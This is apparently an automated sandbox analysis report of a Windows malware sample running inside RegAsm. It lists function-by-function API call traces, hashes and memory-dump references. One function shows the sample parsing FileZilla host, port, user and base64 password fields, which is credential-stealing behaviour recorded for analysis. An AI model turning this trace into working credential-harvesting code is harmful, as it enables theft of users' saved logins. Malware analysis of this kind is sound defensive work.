Associated: 00000004.00000002.2534365858.0000000000492000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000004B1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000004BD000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000004E2000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000004EF000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000050F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000051B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000051E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000005A5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000005C5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000005CB000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000064A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000065C000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Heap$AllocInformationProcessTimeZonewsprintf
String ID:
API String ID: 362916592-0
Opcode ID: b881c6b0ead1d296197200307cca27ecd4ed8ab0e7bcc50e28ea7705d7869b14
Instruction ID: 8af700d3b0e32b47e9d6ddd9198ddf9a5cfc8e3ba9127fd648bfb7377b14e362
Opcode Fuzzy Hash: b881c6b0ead1d296197200307cca27ecd4ed8ab0e7bcc50e28ea7705d7869b14
Instruction Fuzzy Hash: 461152B1A45228EFEB108B54DC45F9AB7B8FB05711F10439AE516932C0D7785A40CF55

Function 00417850 Relevance: 4.5, APIs: 3, Instructions: 36memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,004011B7), ref: 00417880
HeapAlloc.KERNEL32(00000000,?,?,?,004011B7), ref: 00417887
GetUserNameA.ADVAPI32(00000104,00000104), ref: 0041789F

Memory Dump Source

Source File: 00000004.00000002.2534365858.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2534365858.000000000045A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.0000000000485000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.0000000000488000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000048F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.0000000000492000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000004B1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000004BD000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000004E2000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000004EF000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000050F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000051B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000051E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000005A5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000005C5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000005CB000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000064A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000065C000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Heap$AllocNameProcessUser
String ID:
API String ID: 1206570057-0
Opcode ID: 98be1400a0f13b17dcfec3579e84c662f1c1c1bd9e35413721d24a5daf15813c
Instruction ID: ff9f3fb77af2488786a742b30a7a77c7a6675fe12b7944dcc27658a291e6e945
Opcode Fuzzy Hash: 98be1400a0f13b17dcfec3579e84c662f1c1c1bd9e35413721d24a5daf15813c
Instruction Fuzzy Hash: 08F04FB5D44208AFC710DFD8DD49BAEBBB8EB05711F10025AFA05A2680C77815448BA2

Function 00401160 Relevance: 3.0, APIs: 2, Instructions: 15COMMON

Download Yara Rule

APIs

GetSystemInfo.KERNEL32(?,?,?,?,?,?,?,?,?,00416A17,00420AEF), ref: 0040116A
ExitProcess.KERNEL32 ref: 0040117E

Memory Dump Source

Source File: 00000004.00000002.2534365858.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2534365858.000000000045A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.0000000000485000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.0000000000488000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000048F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.0000000000492000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000004B1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000004BD000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000004E2000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000004EF000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000050F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000051B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000051E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000005A5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000005C5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000005CB000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000064A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000065C000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: ExitInfoProcessSystem
String ID:
API String ID: 752954902-0
Opcode ID: 5e169adc815d3d5e963ffc5450d2c06f987a57c1971b55ed15331b47ed99491e
Instruction ID: a8b5f4e8781596c88644d8aa2969b9d6e82c50da38cf1cac8898b5ca04c80d98
Opcode Fuzzy Hash: 5e169adc815d3d5e963ffc5450d2c06f987a57c1971b55ed15331b47ed99491e
Instruction Fuzzy Hash: F4D05E7C94030CEBCB14EFE0D9496DDBB79FB0D311F001559ED0572340EA306481CAA6

Function 00419C10 Relevance: 200.2, APIs: 112, Strings: 2, Instructions: 684
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetProcAddress.KERNEL32(75900000,01332648), ref: 00419C2D
GetProcAddress.KERNEL32(75900000,013328A8), ref: 00419C45
GetProcAddress.KERNEL32(75900000,0133A7C8), ref: 00419C5E
GetProcAddress.KERNEL32(75900000,0133A720), ref: 00419C76
GetProcAddress.KERNEL32(75900000,0133A7B0), ref: 00419C8E
GetProcAddress.KERNEL32(75900000,0133A7E0), ref: 00419CA7
GetProcAddress.KERNEL32(75900000,01333E48), ref: 00419CBF
GetProcAddress.KERNEL32(75900000,0133A7F8), ref: 00419CD7
GetProcAddress.KERNEL32(75900000,0133A840), ref: 00419CF0
GetProcAddress.KERNEL32(75900000,0133A5A0), ref: 00419D08
GetProcAddress.KERNEL32(75900000,0133A6D8), ref: 00419D20
GetProcAddress.KERNEL32(75900000,01332848), ref: 00419D39
GetProcAddress.KERNEL32(75900000,01332788), ref: 00419D51
GetProcAddress.KERNEL32(75900000,013328E8), ref: 00419D69
GetProcAddress.KERNEL32(75900000,01332928), ref: 00419D82
GetProcAddress.KERNEL32(75900000,0133A5D0), ref: 00419D9A
GetProcAddress.KERNEL32(75900000,0133A858), ref: 00419DB2
GetProcAddress.KERNEL32(75900000,01334410), ref: 00419DCB
GetProcAddress.KERNEL32(75900000,013328C8), ref: 00419DE3
GetProcAddress.KERNEL32(75900000,0133A678), ref: 00419DFB
GetProcAddress.KERNEL32(75900000,0133A5E8), ref: 00419E14
GetProcAddress.KERNEL32(75900000,0133A738), ref: 00419E2C
GetProcAddress.KERNEL32(75900000,0133A600), ref: 00419E44
GetProcAddress.KERNEL32(75900000,013326E8), ref: 00419E5D
GetProcAddress.KERNEL32(75900000,0133A6C0), ref: 00419E75
GetProcAddress.KERNEL32(75900000,0133A6A8), ref: 00419E8D
GetProcAddress.KERNEL32(75900000,0133A570), ref: 00419EA6
GetProcAddress.KERNEL32(75900000,0133A618), ref: 00419EBE
GetProcAddress.KERNEL32(75900000,0133A630), ref: 00419ED6
GetProcAddress.KERNEL32(75900000,0133A588), ref: 00419EEF
GetProcAddress.KERNEL32(75900000,0133A5B8), ref: 00419F07
GetProcAddress.KERNEL32(75900000,0133A648), ref: 00419F1F
GetProcAddress.KERNEL32(75900000,0133A690), ref: 00419F38
GetProcAddress.KERNEL32(75900000,01341A10), ref: 00419F50
GetProcAddress.KERNEL32(75900000,0133A660), ref: 00419F68
GetProcAddress.KERNEL32(75900000,0133A6F0), ref: 00419F81
GetProcAddress.KERNEL32(75900000,01332768), ref: 00419F99
GetProcAddress.KERNEL32(75900000,01341E88), ref: 00419FB1
GetProcAddress.KERNEL32(75900000,013326A8), ref: 00419FCA
GetProcAddress.KERNEL32(75900000,01341E70), ref: 00419FE2
GetProcAddress.KERNEL32(75900000,01341F30), ref: 00419FFA
GetProcAddress.KERNEL32(75900000,013327A8), ref: 0041A013
GetProcAddress.KERNEL32(75900000,01332908), ref: 0041A02B
LoadLibraryA.KERNEL32(01341EA0,?,00415CA3,?,00000034,00000064,00416600,?,0000002C,00000064,004165A0,?,00000030,00000064,Function_00015AD0,?), ref: 0041A03D
LoadLibraryA.KERNEL32(01341F78,?,00415CA3,?,00000034,00000064,00416600,?,0000002C,00000064,004165A0,?,00000030,00000064,Function_00015AD0,?), ref: 0041A04E
LoadLibraryA.KERNEL32(01342050,?,00415CA3,?,00000034,00000064,00416600,?,0000002C,00000064,004165A0,?,00000030,00000064,Function_00015AD0,?), ref: 0041A060
LoadLibraryA.KERNEL32(01341FC0,?,00415CA3,?,00000034,00000064,00416600,?,0000002C,00000064,004165A0,?,00000030,00000064,Function_00015AD0,?), ref: 0041A072
LoadLibraryA.KERNEL32(01341E58,?,00415CA3,?,00000034,00000064,00416600,?,0000002C,00000064,004165A0,?,00000030,00000064,Function_00015AD0,?), ref: 0041A083
LoadLibraryA.KERNEL32(01341DF8,?,00415CA3,?,00000034,00000064,00416600,?,0000002C,00000064,004165A0,?,00000030,00000064,Function_00015AD0,?), ref: 0041A095
LoadLibraryA.KERNEL32(01341E10,?,00415CA3,?,00000034,00000064,00416600,?,0000002C,00000064,004165A0,?,00000030,00000064,Function_00015AD0,?), ref: 0041A0A7
LoadLibraryA.KERNEL32(01341E28,?,00415CA3,?,00000034,00000064,00416600,?,0000002C,00000064,004165A0,?,00000030,00000064,Function_00015AD0,?), ref: 0041A0B8
GetProcAddress.KERNEL32(75FD0000,013326C8), ref: 0041A0DA
GetProcAddress.KERNEL32(75FD0000,01341FA8), ref: 0041A0F2
GetProcAddress.KERNEL32(75FD0000,0133A998), ref: 0041A10A
GetProcAddress.KERNEL32(75FD0000,01341EB8), ref: 0041A123
GetProcAddress.KERNEL32(75FD0000,013329A8), ref: 0041A13B
GetProcAddress.KERNEL32(734B0000,013342F8), ref: 0041A160
GetProcAddress.KERNEL32(734B0000,013327C8), ref: 0041A179
GetProcAddress.KERNEL32(734B0000,01334370), ref: 0041A191
GetProcAddress.KERNEL32(734B0000,01341ED0), ref: 0041A1A9
GetProcAddress.KERNEL32(734B0000,01341EE8), ref: 0041A1C2
GetProcAddress.KERNEL32(734B0000,013325E8), ref: 0041A1DA
GetProcAddress.KERNEL32(734B0000,01332948), ref: 0041A1F2
GetProcAddress.KERNEL32(734B0000,01341F00), ref: 0041A20B
GetProcAddress.KERNEL32(763B0000,01332968), ref: 0041A22C
GetProcAddress.KERNEL32(763B0000,013325C8), ref: 0041A244
GetProcAddress.KERNEL32(763B0000,01341DB0), ref: 0041A25D
GetProcAddress.KERNEL32(763B0000,01342068), ref: 0041A275
GetProcAddress.KERNEL32(763B0000,01332668), ref: 0041A28D
GetProcAddress.KERNEL32(750F0000,01334348), ref: 0041A2B3
GetProcAddress.KERNEL32(750F0000,01334438), ref: 0041A2CB
GetProcAddress.KERNEL32(750F0000,01341F48), ref: 0041A2E3
GetProcAddress.KERNEL32(750F0000,01332988), ref: 0041A2FC
GetProcAddress.KERNEL32(750F0000,01332808), ref: 0041A314
GetProcAddress.KERNEL32(750F0000,01334398), ref: 0041A32C
GetProcAddress.KERNEL32(75A50000,01341E40), ref: 0041A352
GetProcAddress.KERNEL32(75A50000,013327E8), ref: 0041A36A
GetProcAddress.KERNEL32(75A50000,0133AAF8), ref: 0041A382
GetProcAddress.KERNEL32(75A50000,01341D98), ref: 0041A39B
GetProcAddress.KERNEL32(75A50000,01341F18), ref: 0041A3B3
GetProcAddress.KERNEL32(75A50000,01332708), ref: 0041A3CB
GetProcAddress.KERNEL32(75A50000,01332868), ref: 0041A3E4
GetProcAddress.KERNEL32(75A50000,01341F60), ref: 0041A3FC
GetProcAddress.KERNEL32(75A50000,01341FD8), ref: 0041A414
GetProcAddress.KERNEL32(75070000,01332608), ref: 0041A436
GetProcAddress.KERNEL32(75070000,01341F90), ref: 0041A44E
GetProcAddress.KERNEL32(75070000,01341DC8), ref: 0041A466
GetProcAddress.KERNEL32(75070000,01341DE0), ref: 0041A47F
GetProcAddress.KERNEL32(75070000,01341FF0), ref: 0041A497
GetProcAddress.KERNEL32(74E50000,01332688), ref: 0041A4B8
GetProcAddress.KERNEL32(74E50000,01332828), ref: 0041A4D1
GetProcAddress.KERNEL32(75320000,01332888), ref: 0041A4F2
GetProcAddress.KERNEL32(75320000,01342008), ref: 0041A50A
GetProcAddress.KERNEL32(6F060000,01332728), ref: 0041A530
GetProcAddress.KERNEL32(6F060000,01332628), ref: 0041A548
GetProcAddress.KERNEL32(6F060000,01332748), ref: 0041A560
GetProcAddress.KERNEL32(6F060000,01342020), ref: 0041A579
GetProcAddress.KERNEL32(6F060000,01342760), ref: 0041A591
GetProcAddress.KERNEL32(6F060000,01342840), ref: 0041A5A9
GetProcAddress.KERNEL32(6F060000,013426E0), ref: 0041A5C2
GetProcAddress.KERNEL32(6F060000,013425C0), ref: 0041A5DA
GetProcAddress.KERNEL32(6F060000,InternetSetOptionA), ref: 0041A5F1
GetProcAddress.KERNEL32(6F060000,HttpQueryInfoA), ref: 0041A607
GetProcAddress.KERNEL32(74E00000,01342038), ref: 0041A629
GetProcAddress.KERNEL32(74E00000,0133AB08), ref: 0041A641
GetProcAddress.KERNEL32(74E00000,01342080), ref: 0041A659
GetProcAddress.KERNEL32(74E00000,01342140), ref: 0041A672
GetProcAddress.KERNEL32(74DF0000,013426C0), ref: 0041A693
GetProcAddress.KERNEL32(6E500000,01342128), ref: 0041A6B4
GetProcAddress.KERNEL32(6E500000,01342860), ref: 0041A6CD
GetProcAddress.KERNEL32(6E500000,01342110), ref: 0041A6E5
GetProcAddress.KERNEL32(6E500000,01342098), ref: 0041A6FD

Strings

HttpQueryInfoA, xrefs: 0041A5FC
InternetSetOptionA, xrefs: 0041A5E5

Memory Dump Source

Source File: 00000004.00000002.2534365858.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2534365858.000000000045A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.0000000000485000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.0000000000488000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000048F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.0000000000492000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000004B1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000004BD000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000004E2000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000004EF000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000050F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000051B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000051E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000005A5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000005C5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000005CB000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000064A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000065C000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: AddressProc$LibraryLoad
String ID: HttpQueryInfoA$InternetSetOptionA
API String ID: 2238633743-1775429166
Opcode ID: 62050089a8b8835eafd1d37742ef1b979ae5b20786234f8d6d940be7715c0619
Instruction ID: b148544ec257a615b167952e2e9b89b3667e8f5620887ecf26b211dda149ff7d
Opcode Fuzzy Hash: 62050089a8b8835eafd1d37742ef1b979ae5b20786234f8d6d940be7715c0619
Instruction Fuzzy Hash: 02621DBD5C0200BFD364DFE8EE889A63BFBF74E701714A61AE609C3264D6399441DB52

Function 00407710 Relevance: 81.6, APIs: 54, Instructions: 584
stringmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetProcessHeap.KERNEL32(00000000,0098967F,?,004161C4,?), ref: 00407724
RtlAllocateHeap.NTDLL(00000000,?,004161C4,?), ref: 0040772B
lstrcatA.KERNEL32(?,0133F6F0,?,000003E8,?,000003E8,?,000003E8,?,000003E8,?,000003E8,?,000003E8,?,000003E8), ref: 004078DB
lstrcatA.KERNEL32(?,?,?,004161C4,?), ref: 004078EF
lstrcatA.KERNEL32(?,?,?,004161C4,?), ref: 00407903
lstrcatA.KERNEL32(?,?,?,004161C4,?), ref: 00407917
lstrcatA.KERNEL32(?,01342EE8,?,004161C4,?), ref: 0040792B
lstrcatA.KERNEL32(?,01342FA8,?,004161C4,?), ref: 0040793F
lstrcatA.KERNEL32(?,01342DC8,?,004161C4,?), ref: 00407952
lstrcatA.KERNEL32(?,01342E70,?,004161C4,?), ref: 00407966
lstrcatA.KERNEL32(?,0133F778,?,004161C4,?), ref: 0040797A
lstrcatA.KERNEL32(?,?,?,004161C4,?), ref: 0040798E
lstrcatA.KERNEL32(?,?,?,004161C4,?), ref: 004079A2
lstrcatA.KERNEL32(?,?,?,004161C4,?), ref: 004079B6
lstrcatA.KERNEL32(?,01342EE8,?,004161C4,?), ref: 004079C9
lstrcatA.KERNEL32(?,01342FA8,?,004161C4,?), ref: 004079DD
lstrcatA.KERNEL32(?,01342DC8,?,004161C4,?), ref: 004079F1
lstrcatA.KERNEL32(?,01342E70,?,004161C4,?), ref: 00407A04
lstrcatA.KERNEL32(?,01343588,?,004161C4,?), ref: 00407A18
lstrcatA.KERNEL32(?,?,?,004161C4,?), ref: 00407A2C
lstrcatA.KERNEL32(?,?,?,004161C4,?), ref: 00407A40
lstrcatA.KERNEL32(?,?,?,004161C4,?), ref: 00407A54
lstrcatA.KERNEL32(?,01342EE8,?,004161C4,?), ref: 00407A68
lstrcatA.KERNEL32(?,01342FA8,?,004161C4,?), ref: 00407A7B
lstrcatA.KERNEL32(?,01342DC8,?,004161C4,?), ref: 00407A8F
lstrcatA.KERNEL32(?,01342E70,?,004161C4,?), ref: 00407AA3
lstrcatA.KERNEL32(?,013435F0,?,004161C4,?), ref: 00407AB6
lstrcatA.KERNEL32(?,?,?,004161C4,?), ref: 00407ACA
lstrcatA.KERNEL32(?,?,?,004161C4,?), ref: 00407ADE
lstrcatA.KERNEL32(?,?,?,004161C4,?), ref: 00407AF2
lstrcatA.KERNEL32(?,01342EE8,?,004161C4,?), ref: 00407B06
lstrcatA.KERNEL32(?,01342FA8,?,004161C4,?), ref: 00407B1A
lstrcatA.KERNEL32(?,01342DC8,?,004161C4,?), ref: 00407B2D
lstrcatA.KERNEL32(?,01342E70,?,004161C4,?), ref: 00407B41
lstrcatA.KERNEL32(?,01343658,?,004161C4,?), ref: 00407B55
lstrcatA.KERNEL32(?,?,?,004161C4,?), ref: 00407B69
lstrcatA.KERNEL32(?,?,?,004161C4,?), ref: 00407B7D
lstrcatA.KERNEL32(?,?,?,004161C4,?), ref: 00407B91
lstrcatA.KERNEL32(?,01342EE8,?,004161C4,?), ref: 00407BA4
lstrcatA.KERNEL32(?,01342FA8,?,004161C4,?), ref: 00407BB8
lstrcatA.KERNEL32(?,01342DC8,?,004161C4,?), ref: 00407BCC
lstrcatA.KERNEL32(?,01342E70,?,004161C4,?), ref: 00407BDF
lstrcatA.KERNEL32(?,013436C0,?,004161C4,?), ref: 00407BF3
lstrcatA.KERNEL32(?,?,?,004161C4,?), ref: 00407C07
lstrcatA.KERNEL32(?,?,?,004161C4,?), ref: 00407C1B
lstrcatA.KERNEL32(?,?,?,004161C4,?), ref: 00407C2F
lstrcatA.KERNEL32(?,01342EE8,?,004161C4,?), ref: 00407C43
lstrcatA.KERNEL32(?,01342FA8,?,004161C4,?), ref: 00407C56
lstrcatA.KERNEL32(?,01342DC8,?,004161C4,?), ref: 00407C6A
lstrcatA.KERNEL32(?,01342E70,?,004161C4,?), ref: 00407C7E

Part of subcall function 004075D0: lstrcatA.KERNEL32(33A67020,004217FC,00407C90,80000001,004161C4,?,?,?,?,?,00407C90,?,?,004161C4), ref: 00407606
Part of subcall function 004075D0: lstrcatA.KERNEL32(33A67020,00000000,00000000), ref: 00407648
Part of subcall function 004075D0: lstrcatA.KERNEL32(33A67020, : ), ref: 0040765A
Part of subcall function 004075D0: lstrcatA.KERNEL32(33A67020,00000000,00000000,00000000), ref: 0040768F
Part of subcall function 004075D0: lstrcatA.KERNEL32(33A67020,00421804), ref: 004076A0
Part of subcall function 004075D0: lstrcatA.KERNEL32(33A67020,00000000,00000000,00000000), ref: 004076D3
Part of subcall function 004075D0: lstrcatA.KERNEL32(33A67020,00421808), ref: 004076ED
Part of subcall function 004075D0: task.LIBCPMTD ref: 004076FB

lstrcatA.KERNEL32(?,01343978,?,00000104), ref: 00407E0B
lstrcatA.KERNEL32(?,01342200), ref: 00407E1E
lstrlenA.KERNEL32(33A67020), ref: 00407E2B
lstrlenA.KERNEL32(33A67020), ref: 00407E3B

Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788

Memory Dump Source

Source File: 00000004.00000002.2534365858.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2534365858.000000000045A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.0000000000485000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.0000000000488000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000048F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.0000000000492000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000004B1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000004BD000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000004E2000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000004EF000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000050F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000051B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000051E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000005A5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000005C5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000005CB000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000064A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000065C000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: lstrcat$Heaplstrlen$AllocateProcesslstrcpytask
String ID:
API String ID: 928082926-0
Opcode ID: 6fcfd6c6baea700e61f3ac76ac6e2f698724bd4a5264edc9866c41ae3b3538d0
Instruction ID: e42d55f5272c4be8e3f59257355b8fca4430f3dac2d75aeea8cbf9ff20cdab91
Opcode Fuzzy Hash: 6fcfd6c6baea700e61f3ac76ac6e2f698724bd4a5264edc9866c41ae3b3538d0
Instruction Fuzzy Hash: 12324EBAD50314ABD715EBE0DC85DEA737DBB45700F005A9DF209A2080EE78E7858F56

Function 00410250 Relevance: 77.4, APIs: 32, Strings: 12, Instructions: 363
stringmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788

Part of subcall function 00418DE0: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,000003E8), ref: 00418E0B

Part of subcall function 0041A920: lstrcpy.KERNEL32(00000000,?), ref: 0041A972
Part of subcall function 0041A920: lstrcatA.KERNEL32(00000000), ref: 0041A982

Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905

Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12

Part of subcall function 0041A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0041A7E6

Part of subcall function 004099C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 004099EC
Part of subcall function 004099C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00409A11
Part of subcall function 004099C0: LocalAlloc.KERNEL32(00000040,?), ref: 00409A31
Part of subcall function 004099C0: ReadFile.KERNEL32(000000FF,?,00000000,004102E7,00000000), ref: 00409A5A
Part of subcall function 004099C0: LocalFree.KERNEL32(004102E7), ref: 00409A90
Part of subcall function 004099C0: CloseHandle.KERNEL32(000000FF), ref: 00409A9A

Part of subcall function 00418E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00418E52

strtok_s.MSVCRT ref: 0041031B
GetProcessHeap.KERNEL32(00000000,000F423F,00420DBA,00420DB7,00420DB6,00420DB3), ref: 00410362
HeapAlloc.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00420DB2), ref: 00410369
StrStrA.SHLWAPI(00000000,<Host>), ref: 00410385
lstrlenA.KERNEL32(00000000), ref: 00410393

Part of subcall function 004188E0: malloc.MSVCRT ref: 004188E8
Part of subcall function 004188E0: strncpy.MSVCRT ref: 00418903

StrStrA.SHLWAPI(00000000,<Port>), ref: 004103CF
lstrlenA.KERNEL32(00000000), ref: 004103DD
StrStrA.SHLWAPI(00000000,<User>), ref: 00410419
lstrlenA.KERNEL32(00000000), ref: 00410427
StrStrA.SHLWAPI(00000000,<Pass encoding="base64">), ref: 00410463
lstrlenA.KERNEL32(00000000), ref: 00410475
lstrlenA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00420DB2), ref: 00410502
lstrlenA.KERNEL32(00000000,?,?,00000000), ref: 0041051A
lstrlenA.KERNEL32(00000000,?,?,00000000), ref: 00410532
lstrlenA.KERNEL32(00000000,?,?,00000000), ref: 0041054A
lstrcatA.KERNEL32(?,browser: FileZilla,?,?,00000000), ref: 00410562
lstrcatA.KERNEL32(?,profile: null,?,?,00000000), ref: 00410571
lstrcatA.KERNEL32(?,url: ,?,?,00000000), ref: 00410580
lstrcatA.KERNEL32(?,00000000,?,?,00000000), ref: 00410593
lstrcatA.KERNEL32(?,00421678,?,?,00000000), ref: 004105A2
